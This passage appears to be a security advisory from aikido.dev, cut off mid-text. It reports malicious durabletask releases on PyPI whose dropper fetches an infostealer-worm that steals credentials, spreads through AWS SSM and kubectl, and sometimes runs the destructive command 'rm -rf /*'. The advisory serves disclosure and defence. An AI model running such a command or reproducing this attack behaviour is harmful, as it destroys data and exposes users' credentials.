By aikido.dev
Publication Date: 2026-05-19 00:00:00
We’ve identified three malicious versions of durabletask on PyPI, 1.4.1, 1.4.2, and 1.4.3, that contain a dropper injected directly into the package’s Python source files. When a developer installs any of these versions and imports the library, the dropper silently fetches and executes a second-stage payload from a three-day-old C2 domain.
That second stage is a full-featured infostealer and worm. It harvests credentials from every major cloud provider, password manager, and developer tool it can find, encrypts the results with an attacker-controlled RSA key, and ships them off to C2. If the machine is running inside AWS, it propagates itself to other EC2 instances using SSM. If it’s inside Kubernetes, it propagates through kubectl exec. And if it detects Israeli or Iranian system settings, there’s a 1-in-6 chance it plays audio and then runs rm -rf /*.
This does smell of more TeamPCP shenanigans, but we can’t be sure for now.
What happened
durabletask is a Python package for the…